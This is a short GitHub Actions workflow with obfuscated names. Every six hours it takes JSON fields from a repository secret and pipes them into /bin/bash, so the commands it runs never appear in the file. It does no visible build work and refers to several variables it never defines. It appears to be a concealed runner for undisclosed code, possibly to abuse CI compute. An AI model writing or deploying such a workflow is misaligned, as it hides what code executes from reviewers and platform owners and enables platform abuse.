name: xupingzhi4321

on:
  workflow_dispatch:
  schedule:
    - cron: '37 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xupingzhi4321
        env:
          bh555: ${{ secrets.bh555 }}
        run: |
          echo $bh555 | jq -r .q655 | /bin/bash
          echo $vao64 | jq -r .dyos914 | /bin/bash
          echo $rk2993 | jq -r .juspz20458 | /bin/bash
          echo $sue8 | jq -r .qjwy97 | /bin/bash

